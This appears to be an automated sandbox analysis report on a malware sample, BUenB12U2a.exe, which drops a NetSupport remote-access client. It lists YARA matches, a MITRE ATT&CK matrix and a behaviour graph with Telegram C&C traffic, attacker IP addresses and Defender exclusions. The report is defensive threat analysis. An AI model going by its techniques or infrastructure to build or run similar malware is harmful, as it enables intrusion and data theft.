                                Source: Yara matchFile source: 00000001.00000003.2012237313.0000020E478FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1967697722.000000006CE09000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1792471952.0000020E4790C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.2006155936.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.1881091510.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1795250891.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1966498430.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1795386408.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1790436043.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.2010748148.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.1879479005.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.2009351645.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1790942372.0000020E47972000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.1962246651.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1793258912.0000020E478C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.2019629636.0000020E478FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000000.1797525197.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.2010326059.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3573445263.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1792471952.0000020E4791C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1967653135.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1795157174.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: BUenB12U2a.exe PID: 6284, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3452, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 1868, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire Infrastructure1
                                Valid Accounts                                		2
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		11
                                Disable or Modify Tools                                		1
                                Input Capture                                		12
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Web Service                                		Exfiltration Over Other Network Medium1
                                Defacement
                                CredentialsDomainsDefault AccountsScheduled Task/Job1
                                Valid Accounts                                		1
                                Valid Accounts                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		4
                                Ingress Tool Transfer                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain AccountsAt1
                                Registry Run Keys / Startup Folder                                		11
                                Access Token Manipulation                                		4
                                Obfuscated Files or Information                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		22
                                Encrypted Channel                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook13
                                Process Injection                                		1
                                Software Packing                                		NTDS35
                                System Information Discovery                                		Distributed Component Object ModelInput Capture11
                                Non-Standard Port                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                                Registry Run Keys / Startup Folder                                		1
                                Timestomp                                		LSA Secrets141
                                Security Software Discovery                                		SSHKeylogging5
                                Non-Application Layer Protocol                                		Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                DLL Side-Loading                                		Cached Domain Credentials2
                                Process Discovery                                		VNCGUI Input Capture6
                                Application Layer Protocol                                		Data Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                Masquerading                                		DCSync21
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                Valid Accounts                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                                Access Token Manipulation                                		Network Sniffing2
                                System Network Configuration Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd13
                                Process Injection                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1621635 Sample: BUenB12U2a.exe Startdate: 22/02/2025 Architecture: WINDOWS Score: 92 67 api.telegram.org 2->67 69 geo.netsupportsoftware.com 2->69 71 api.ipify.org 2->71 81 Suricata IDS alerts for network traffic 2->81 83 Multi AV Scanner detection for submitted file 2->83 85 Uses known network protocols on non-standard ports 2->85 89 2 other signatures 2->89 9 BUenB12U2a.exe 89 2->9         started        13 client32.exe 2->13         started        15 client32.exe 2->15         started        signatures3 87 Uses the Telegram API (likely for C&C communication) 67->87 process4 file5 53 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 9->53 dropped 55 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 9->55 dropped 57 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 9->57 dropped 59 66 other files (none is malicious) 9->59 dropped 95 Adds a directory exclusion to Windows Defender 9->95 97 Found pyInstaller with non standard icon 9->97 17 BUenB12U2a.exe 1 14 9->17         started        signatures6 process7 dnsIp8 61 api.telegram.org 149.154.167.220, 443, 49744 TELEGRAMRU United Kingdom 17->61 63 147.45.198.181, 49732, 80 FREE-NET-ASFREEnetEU Russian Federation 17->63 65 api.ipify.org 172.67.74.152, 443, 49743 CLOUDFLARENETUS United States 17->65 45 C:\Users\user\AppData\...\client32.exe, PE32 17->45 dropped 47 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 17->47 dropped 49 C:\Users\user\AppData\...\msvcr100.dll, PE32 17->49 dropped 51 5 other files (none is malicious) 17->51 dropped 91 Adds a directory exclusion to Windows Defender 17->91 22 cmd.exe 1 17->22         started        24 powershell.exe 23 17->24         started        27 cmd.exe 1 17->27         started        29 WMIC.exe 1 17->29         started        file9 signatures10 process11 signatures12 31 client32.exe 16 22->31         started        35 conhost.exe 22->35         started        93 Loading BitLocker PowerShell Module 24->93 37 conhost.exe 24->37         started        39 WmiPrvSE.exe 24->39         started        41 conhost.exe 27->41         started        43 conhost.exe 29->43         started        process13 dnsIp14 73 64.190.113.159, 1488, 49733 TRAVELCLICKCORP1US United States 31->73 75 geo.netsupportsoftware.com 104.26.1.231, 49734, 49735, 49736 CLOUDFLARENETUS United States 31->75 77 Contains functionalty to change the wallpaper 31->77 79 Contains functionality to detect sleep reduction / modifications 31->79 signatures15

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.